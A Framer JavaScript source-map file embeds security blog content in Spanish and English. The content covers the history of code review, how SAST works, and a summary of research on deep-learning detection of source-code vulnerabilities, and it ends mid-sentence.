{"version":3,"file":"WJBZI1Ghk-77.Tg0evARu.mjs","names":["a","i","n","r"],"sources":["https:/framerusercontent.com/modules/xkgOTPH3D819XQA1Lv94/f7EzDt54JfBX9aTXubsh/WJBZI1Ghk-77.js"],"sourcesContent":["import{jsx as e,jsxs as t}from\"react/jsx-runtime\";import{ComponentPresetsConsumer as n,Link as a}from\"framer\";import{motion as i}from\"framer-motion\";import*as o from\"react\";import r from\"https://framerusercontent.com/modules/pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js\";export const richText=/*#__PURE__*/t(o.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"Un poco de historia\"}),/*#__PURE__*/t(\"p\",{children:['En su art\\xedculo de 1976, \"Design and Code Inspections to Reduce Errors in Program Development\", Michael E. Fagan explic\\xf3 c\\xf3mo realizar una revisi\\xf3n de c\\xf3digo y, de este modo, cre\\xf3 el primer proceso de ',/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/es/products/secure-code-review\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"revisi\\xf3n de c\\xf3digo\"})}),\" del mundo. La \",/*#__PURE__*/e(a,{href:\"https://en.wikipedia.org/wiki/Fagan_inspection\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"inspecci\\xf3n de Fagan\"})}),\" es un proceso de ejecuci\\xf3n formal que implica varias fases y participantes y detecta defectos en el desarrollo de \",/*#__PURE__*/e(\"em\",{children:\"software\"}),\" mediante la validaci\\xf3n de criterios de entrada y salida predefinidos.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Flujo de Fagan\",className:\"framer-image\",height:\"166\",src:\"https://framerusercontent.com/images/Zl2YkXTtXJZJigQRLo9OkgLXec.png\",srcSet:\"https://framerusercontent.com/images/Zl2YkXTtXJZJigQRLo9OkgLXec.png?scale-down-to=512 512w,https://framerusercontent.com/images/Zl2YkXTtXJZJigQRLo9OkgLXec.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/Zl2YkXTtXJZJigQRLo9OkgLXec.png 1920w\",style:{aspectRatio:\"1920 / 332\"},width:\"960\"}),/*#__PURE__*/t(\"h6\",{children:[\"Flujo de Fagan (imagen tomada de \",/*#__PURE__*/e(a,{href:\"https://www.secjuice.com/sast-isnt-code-review-fight-me/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"aqu\\xed\"})}),\").\"]}),/*#__PURE__*/t(\"p\",{children:[\"En 1992, en su art\\xedculo “Experience with Fagan's Inspection Method”, E.P. Doolan propuso utilizar un \",/*#__PURE__*/e(\"em\",{children:\"software\"}),\" que mantuviera una base de datos de errores previamente detectados y escaneara autom\\xe1ticamente el c\\xf3digo en busca de ellos. Esto fue lo que dio inicio al uso de herramientas automatizadas de revisi\\xf3n de c\\xf3digo.\"]}),/*#__PURE__*/t(\"h2\",{children:[\"Ciclo de vida de desarrollo de \",/*#__PURE__*/e(\"em\",{children:\"software\"}),\" (SDLC)\"]}),/*#__PURE__*/t(\"p\",{children:[\"El SDLC es una serie de etapas que deben seguirse para el desarrollo de un producto de \",/*#__PURE__*/e(\"em\",{children:\"software\"}),\" espec\\xedfico. Estas etapas garantizan que la calidad, la funcionalidad y los objetivos de la aplicaci\\xf3n cumplan las expectativas del cliente y los est\\xe1ndares de desarrollo.\"]}),/*#__PURE__*/e(\"img\",{alt:\"SDLC\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/oRzwuzyDIQ9NZOLVyNX5k5df0lY.png\",srcSet:\"https://framerusercontent.com/images/oRzwuzyDIQ9NZOLVyNX5k5df0lY.png?scale-down-to=512 512w,https://framerusercontent.com/images/oRzwuzyDIQ9NZOLVyNX5k5df0lY.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/oRzwuzyDIQ9NZOLVyNX5k5df0lY.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"h6\",{children:[\"Ciclo de vida de desarrollo de \",/*#__PURE__*/e(\"em\",{children:\"software\"}),\" (imagen tomada de \",/*#__PURE__*/e(a,{href:\"https://www.synotive.com/blog/wp-content/uploads/2017/02/software-development-life-cycle.jpg\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"aqu\\xed\"})}),\").\"]}),/*#__PURE__*/e(\"p\",{children:\"Desde las primeras fases del SDLC es importante utilizar metodolog\\xedas de prueba que identifiquen r\\xe1pidamente las vulnerabilidades de seguridad para remediarlas antes del lanzamiento de la aplicaci\\xf3n. En los siguientes sitios web se pueden encontrar m\\xfaltiples vulnerabilidades conocidas:\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(a,{href:\"https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Proyecto OWASP Top Ten\"})}),\".\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(a,{href:\"https://www.sans.org/top25-software-errors/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"CWE/SANS TOP 25 Errores de software m\\xe1s peligrosos\"})}),\".\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(a,{href:\"https://cwe.mitre.org/data/index.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Enumeraci\\xf3n de debilidades comunes CWE\"})}),\".\"]})})]}),/*#__PURE__*/e(\"img\",{alt:\"OWASP Top 10\",className:\"framer-image\",height:\"400\",src:\"https://framerusercontent.com/images/g2uUptQZsEKhf5V3GN4nDh2t8.png\",srcSet:\"https://framerusercontent.com/images/g2uUptQZsEKhf5V3GN4nDh2t8.png?scale-down-to=512 512w,https://framerusercontent.com/images/g2uUptQZsEKhf5V3GN4nDh2t8.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/g2uUptQZsEKhf5V3GN4nDh2t8.png 1920w\",style:{aspectRatio:\"1920 / 800\"},width:\"960\"}),/*#__PURE__*/t(\"h6\",{children:[\"OWASP Top 10 de 2013 a 2017 (imagen tomada de \",/*#__PURE__*/e(a,{href:\"https://www.owasp.org/images/5/5e/OWASP-Top-10-2017-es.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"aqu\\xed\"})}),\").\"]}),/*#__PURE__*/e(\"p\",{children:\"Aplicando SAST podemos detectar y evitar la mayor\\xeda de las vulnerabilidades de seguridad enumeradas en los sitios web anteriores.\"}),/*#__PURE__*/e(\"h2\",{children:\"\\xbfC\\xf3mo funciona SAST?\"}),/*#__PURE__*/e(\"p\",{children:\"SAST puede aplicarse manualmente o mediante el uso de herramientas automatizadas.\"}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Las pruebas manuales\"}),\" son realizadas por un equipo de evaluadores encargados de revisar el c\\xf3digo en b\\xfasqueda de vulnerabilidades de seguridad conocidas. Una vez encontradas las vulnerabilidades, se reportan al equipo de desarrollo para su soluci\\xf3n. Las pruebas manuales incluyen varias etapas:\"]}),/*#__PURE__*/t(\"ol\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Sincronizaci\\xf3n:\"}),\" Esta etapa incluye recibir de los desarrolladores la aplicaci\\xf3n y una explicaci\\xf3n completa de lo que esta hace y c\\xf3mo lo hace.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Revisi\\xf3n:\"}),\" En esta etapa, el equipo de pruebas toma el c\\xf3digo fuente y analiza cada l\\xednea, m\\xe9todo, clase y archivo en b\\xfasqueda de vulnerabilidades de seguridad.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Reporte:\"}),\" En esta etapa, se eliminan los falsos positivos y la informaci\\xf3n irrelevante, y se crean y entregan reportes de hallazgos a los l\\xedderes de proyecto responsables de comunicarse con los desarrolladores, quienes luego mitigan o remedian las vulnerabilidades.\"]})})]}),/*#__PURE__*/e(\"img\",{alt:\"Ejemplo de reporte\",className:\"framer-image\",height:\"350\",src:\"https://framerusercontent.com/images/QxyOtuAF5aANiRdqfY393vY1FU.png\",srcSet:\"https://framerusercontent.com/images/QxyOtuAF5aANiRdqfY393vY1FU.png?scale-down-to=512 512w,https://framerusercontent.com/images/QxyOtuAF5aANiRdqfY393vY1FU.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/QxyOtuAF5aANiRdqfY393vY1FU.png 1920w\",style:{aspectRatio:\"1920 / 700\"},width:\"960\"}),/*#__PURE__*/t(\"h6\",{children:[\"Ejemplo de un reporte de hallazgo de una prueba manual (imagen tomada de \",/*#__PURE__*/e(a,{href:\"https://www.mitre.org/sites/default/files/publications/secure-code-review-report-sample.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"aqu\\xed\"})}),\").\"]}),/*#__PURE__*/t(\"p\",{children:[\"Muchas \",/*#__PURE__*/e(a,{href:\"https://web.archive.org/web/20241214183544/https://www.owasp.org/index.php/https://www.owasp.org/index.php/Source_Code_Analysis_Tools\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"herramientas\"})}),\" nos permiten realizar an\\xe1lisis de c\\xf3digo automatizados y nos proporcionar reportes de las vulnerabilidades descubiertas durante el escaneo. Estas herramientas flexibles pueden integrarse con diferentes entornos de desarrollo, incluidos Waterfall, integraci\\xf3n continua/despliegue continuo (CI/CD), Agile/DevOps y repositorios, e incluso con otras herramientas de pruebas.\"]}),/*#__PURE__*/e(\"p\",{children:\"Las herramientas automatizadas utilizan funciones sofisticadas como el an\\xe1lisis de flujo de datos, el an\\xe1lisis de flujo de control y el reconocimiento de patrones para identificar posibles vulnerabilidades de seguridad. El resultado es que las vulnerabilidades conocidas se reportan r\\xe1pidamente, algo realmente \\xfatil en proyectos complejos o con demasiadas l\\xedneas de c\\xf3digo.\"}),/*#__PURE__*/e(\"img\",{alt:\"Ejemplo reporte herramienta\",className:\"framer-image\",height:\"450\",src:\"https://framerusercontent.com/images/ACQkuDgGkPrymGhaKIB49O2MfAE.png\",srcSet:\"https://framerusercontent.com/images/ACQkuDgGkPrymGhaKIB49O2MfAE.png?scale-down-to=512 512w,https://framerusercontent.com/images/ACQkuDgGkPrymGhaKIB49O2MfAE.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/ACQkuDgGkPrymGhaKIB49O2MfAE.png 1920w\",style:{aspectRatio:\"1920 / 900\"},width:\"960\"}),/*#__PURE__*/t(\"h6\",{children:[\"Ejemplo de un reporte de hallazgo de una prueba automatizada (imagen tomada de \",/*#__PURE__*/e(a,{href:\"https://www.oreilly.com/library/view/industrial-internet-application/9781788298599/521ecdf9-f298-4e26-9b68-5baf6602094d.xhtml\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"aqu\\xed\"})}),\").\"]}),/*#__PURE__*/e(\"p\",{children:\"Los reportes siempre deber\\xedan ser revisados por expertos, ya que las herramientas automatizadas tienden a notificar un gran n\\xfamero de falsos positivos que deben ser descartados para conocer los riesgos reales de una aplicaci\\xf3n.\"}),/*#__PURE__*/t(\"p\",{children:[\"Seg\\xfan \",/*#__PURE__*/e(a,{href:\"https://www.synopsys.com/software-integrity/resources/knowledge-database/static-application-security-testing.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Synopsys\"})}),\", hay seis sencillos pasos necesarios para realizar SAST de forma eficiente en empresas que tienen un gran n\\xfamero de aplicaciones construidas en diferentes lenguajes, marcos y plataformas.\"]}),/*#__PURE__*/t(\"ol\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Elige una herramienta automatizada capaz de realizar revisiones de c\\xf3digo fuente de aplicaciones escritas en los lenguajes de programaci\\xf3n que utilices.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Gestiona los requisitos de licencia, establece controles de acceso y organiza la infraestructura necesaria para desplegar la herramienta.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Personaliza el alcance de la herramienta, a\\xf1ade o elimina requisitos de verificaci\\xf3n seg\\xfan las necesidades de tu organizaci\\xf3n, integra la herramienta en tu entorno de desarrollo y vincula a una plataforma que te permita hacer un seguimiento de sus resultados e informes.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Prioriza tus aplicaciones en funci\\xf3n de su valor y sus riesgos y realiza escaneos en ellas con la herramienta. Contin\\xfaa con estas evaluaciones a lo largo de la evoluci\\xf3n de tu software.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Analiza los resultados obtenidos por la herramienta y descarta los falsos positivos. Prioriza las vulnerabilidades en funci\\xf3n del riesgo que representan y lleva a cabo su remediaci\\xf3n.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Mant\\xe9n a tus equipos capacitados en el uso adecuado de la herramienta dentro de tu SDLC.\"})})]}),/*#__PURE__*/e(\"h2\",{children:\"Beneficios\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"SAST puede aplicarse en las primeras fases del SDLC, ya que busca vulnerabilidades en el c\\xf3digo antes de que se compile. Siempre que haya remediaci\\xf3n, esto puede ayudar a garantizar que muchas vulnerabilidades de seguridad no se acumulen en la aplicaci\\xf3n justo antes de su lanzamiento.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Remediar vulnerabilidades identificadas con SAST desde las fases tempranas del SDLC significa menores costos en t\\xe9rminos de tiempo y dinero en comparaci\\xf3n con la detecci\\xf3n y remediaci\\xf3n tard\\xedas.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"SAST es flexible y puede adaptarse a cualquier tipo de proyecto.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"SAST puede integrarse completamente con los ambientes CI/CD, Agile y DevOps (\",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/es/cybersecurity-essentials/que-es-devsecops\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"DevSecOps\"})}),\").\"]})})]}),/*#__PURE__*/e(\"h2\",{children:\"Conclusiones\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Es importante conocer las vulnerabilidades de seguridad a las que est\\xe1n expuestas nuestras aplicaciones. Para ello, debemos leer e informarnos continuamente a trav\\xe9s de recursos como OWASP o CWE.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Siempre se deben realizar pruebas de seguridad a las aplicaciones para garantizar que son capaces de mantener la confidencialidad, integridad y disponibilidad de la informaci\\xf3n.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Realiza revisiones continuas de las aplicaciones. Las pruebas de seguridad nunca deber\\xedan realizarse solo una vez.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"El uso de SAST ayuda a los programadores a aprender o reforzar los est\\xe1ndares y pr\\xe1cticas de codificaci\\xf3n segura.\"})})]})]});export const richText1=/*#__PURE__*/t(o.Fragment,{children:[/*#__PURE__*/e(\"p\",{children:\"Currently, data scientists have begun using AI (Artificial Intelligence) algorithms to solve problems from the data perspective. Data scientists have been working on problems related to areas like medicine, data mining, robotics, etc.\"}),/*#__PURE__*/t(\"p\",{children:[\"Some researches have been exploring how Artificial Intelligence can be used in cybersecurity. For example, how we can use Artificial Intelligence for vulnerability detection \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/solutions/secure-code-review/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"inside source code\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"Most vulnerabilities are a result of using bad practices at the time of programming. When these vulnerabilities are not detected in a timely manner, they can later be discovered and exploited by attackers. So, it is important to \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/blog/what-is-vulnerability-management/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"detect vulnerabilities\"})}),\" in the early stages of a system's development.\"]}),/*#__PURE__*/t(\"p\",{children:[\"There are tools that can perform \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/product/sast/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"static analysis\"})}),\" of the source code. These tools \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/blog/secure-code-review/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"check the source code for problems\"})}),\" without the need for compiling and executing it. There are also \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/product/dast/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"dynamic analysis\"})}),\" tools that send information to the system inputs with presets or random values in order to check for failures or improper exceptions handling.\"]})]});export const richText2=/*#__PURE__*/t(o.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"Initial thoughts\"}),/*#__PURE__*/t(\"p\",{children:[\"In a Boston University \",/*#__PURE__*/e(a,{href:\"https://arxiv.org/pdf/1807.04320.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"article\"})}),\", the authors discuss the possibility of using Artificial Intelligence and algorithms for Deep and Machine Learning to automatically detect source code vulnerabilities. The idea stems from the fact that there is a large amount of open-source code available to be analyzed. After all, code is just text and it is possible to use data mining algorithms on source code to extract training data.\"]}),/*#__PURE__*/e(\"p\",{children:\"Static and dynamic code analyzers do not get the most out of source code. The algorithms that they use are based on preset rules that do not take into account small variations in the original rule. The result is that some vulnerabilities and failures may remain undiscovered.\"}),/*#__PURE__*/e(\"p\",{children:\"The purpose of this exercise was to use data mining, and deep and machine learning techniques to automate a process frequently susceptible to human errors, which can then result in unnoticed vulnerabilities in applications or within operating systems. These unnoticed vulnerabilities may then be exploited by hackers.\"}),/*#__PURE__*/e(\"h2\",{children:\"Data\"}),/*#__PURE__*/t(\"p\",{children:[\"For data, they used \",/*#__PURE__*/e(\"code\",{children:\"C\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"C``\"}),\" codes from different sources, such as \",/*#__PURE__*/e(\"code\",{children:\"SATE IV Juliet Test Suite\"}),\", a code recompilation used for test cases that contains some known vulnerabilities, code from \",/*#__PURE__*/e(\"code\",{children:\"Debian\"}),\" distributions, and some \",/*#__PURE__*/e(\"code\",{children:\"GitHub\"}),\" public repositories.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Vulnerable code\",className:\"framer-image\",height:\"100\",src:\"https://framerusercontent.com/images/tUlDToxoLMtK4JCJnFXHFlvRSo.png\",srcSet:\"https://framerusercontent.com/images/tUlDToxoLMtK4JCJnFXHFlvRSo.png?scale-down-to=512 512w,https://framerusercontent.com/images/tUlDToxoLMtK4JCJnFXHFlvRSo.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/tUlDToxoLMtK4JCJnFXHFlvRSo.png 1920w\",style:{aspectRatio:\"1920 / 200\"},width:\"960\"}),/*#__PURE__*/t(\"h6\",{children:[/*#__PURE__*/e(a,{href:\"https://arxiv.org/pdf/1807.04320\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Vulnerable code distribution\"})}),\".\"]}),/*#__PURE__*/e(\"h2\",{children:\"Labeling\"}),/*#__PURE__*/t(\"p\",{children:[\"In labeling, a custom lexer was created to capture only the important information and label the rest as generic. The labels already provided by the test database were used. For the \",/*#__PURE__*/e(\"code\",{children:\"Debian\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"GitHub\"}),\" codes, they used dynamic analyzers in order to search outputs that later could be interpreted by security professionals as one of the known vulnerabilities from the Common Weakness Enumeration (\",/*#__PURE__*/e(\"code\",{children:\"CWE\"}),\") list. Also in the \",/*#__PURE__*/e(\"code\",{children:\"GitHub\"}),\" repositories, they searched inside the commits, words like \",/*#__PURE__*/e(\"em\",{children:\"“buggy”\"}),\", \",/*#__PURE__*/e(\"em\",{children:\"“error”\"}),\", \",/*#__PURE__*/e(\"em\",{children:\"“fixed”\"}),\", \",/*#__PURE__*/e(\"em\",{children:\"“broken”\"}),\", and others, in order to classify each block of source code as vulnerable or non-vulnerable.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Statistics\",className:\"framer-image\",height:\"100\",src:\"https://framerusercontent.com/images/bm0l4ahP3npslFAPL9DiVbirI.png\",srcSet:\"https://framerusercontent.com/images/bm0l4ahP3npslFAPL9DiVbirI.png?scale-down-to=512 512w,https://framerusercontent.com/images/bm0l4ahP3npslFAPL9DiVbirI.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/bm0l4ahP3npslFAPL9DiVbirI.png 1920w\",style:{aspectRatio:\"1920 / 200\"},width:\"960\"}),/*#__PURE__*/t(\"h6\",{children:[/*#__PURE__*/e(a,{href:\"https://arxiv.org/pdf/1807.04320\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Statistics CWE vulnerabilities detected\"})}),\".\"]}),/*#__PURE__*/e(\"h2\",{children:\"Feature extraction\"}),/*#__PURE__*/t(\"p\",{children:[\"In the feature extraction step, two types of \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/blog/crash-course-machine-learning/#artificial-neural-networks-and-deep-learning\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Neural Networks\"})}),\" were tried, \",/*#__PURE__*/e(\"code\",{children:/*#__PURE__*/e(a,{href:\"https://towardsdatascience.com/a-comprehensive-guide-to-convolutional-neural-networks-the-eli5-way-3bd2b1164a53\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"CNN\"})})}),\" (Convolutional Neural Network) and \",/*#__PURE__*/e(\"code\",{children:/*#__PURE__*/e(a,{href:\"https://towardsdatascience.com/recurrent-neural-networks-d4642c9bc7ce\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"RNN\"})})}),\" (Recurrent Neural Network).\"]}),/*#__PURE__*/t(\"p\",{children:[\"Despite the neural network working fine for the data extraction used by the model, classification was not the best. To solve that, after the Neural Networks feature extraction was made, they passed the output through a \",/*#__PURE__*/e(a,{href:\"https://towardsdatascience.com/understanding-random-forest-58381e0602d2\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Random Forest\"})}),\" classifier. They then obtained better results and avoided overfitting.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Convolutional neural network\",className:\"framer-image\",height:\"250\",src:\"https://framerusercontent.com/images/ulAmfPC7946WAB20Nug8AoOM8.png\",srcSet:\"https://framerusercontent.com/images/ulAmfPC7946WAB20Nug8AoOM8.png?scale-down-to=512 512w,https://framerusercontent.com/images/ulAmfPC7946WAB20Nug8AoOM8.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/ulAmfPC7946WAB20Nug8AoOM8.png 1920w\",style:{aspectRatio:\"1920 / 500\"},width:\"960\"}),/*#__PURE__*/t(\"h6\",{children:[/*#__PURE__*/e(a,{href:\"https://arxiv.org/pdf/1807.04320\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Convolutional Neural Network Model and Random Forest\"})}),\".\"]}),/*#__PURE__*/e(\"h2\",{children:\"Results\"}),/*#__PURE__*/t(\"p\",{children:[\"Vulnerability detection using Data mining, and \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/blog/deep-hacking/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Deep and Machine Learning\"})}),\" added some advantages compared with lexical analyzers since they do not need to be compiled to work, and they can be adjusted to obtain the desired precision.\"]}),/*#__PURE__*/e(\"p\",{children:\"Static analyzers have a limited number of findings because of preset rules and the fact that they do not take into account the variations of the rules. Static analyzers only identify a small portion of the real vulnerabilities present in the source code.\"}),/*#__PURE__*/e(\"img\",{alt:\"Vulnerability detection\",className:\"framer-image\",height:\"250\",src:\"https://framerusercontent.com/images/BWAzo3hyKa6p31nZkwVIFdveQ.png\",srcSet:\"https://framerusercontent.com/images/BWAzo3hyKa6p31nZkwVIFdveQ.png?scale-down-to=512 512w,https://framerusercontent.com/images/BWAzo3hyKa6p31nZkwVIFdveQ.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/BWAzo3hyKa6p31nZkwVIFdveQ.png 1920w\",style:{aspectRatio:\"1920 / 500\"},width:\"960\"}),/*#__PURE__*/t(\"h6\",{children:[/*#__PURE__*/e(a,{href:\"https://arxiv.org/pdf/1807.04320\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Detection of vulnerabilities\"})}),\".\"]}),/*#__PURE__*/e(\"p\",{children:\"This algorithm can underline code blocks that might introduce a vulnerability. This allows suggestions that can be used to solve problems. It can also simply notify the person in charge to determine whether there is a vulnerability present or not.\"}),/*#__PURE__*/e(\"h2\",{children:\"Conclusions\"}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/blog/deep-hacking/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Deep and Machine Learning\"})}),\" techniques are used to problem-solve from a different perspective, the perspective of the data. The previous article illustrates several functions where using Artificial Intelligence in security is helping to automate functions previously done by humans. Using Artificial Intelligence allows humans to focus on the analysis of problems rather than their detection.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Before these tools can be widely used within the industry, they need some improvement. However, they demonstrate the potential this type of tool has during the process of vulnerability disclosure. It is also important to evaluate the 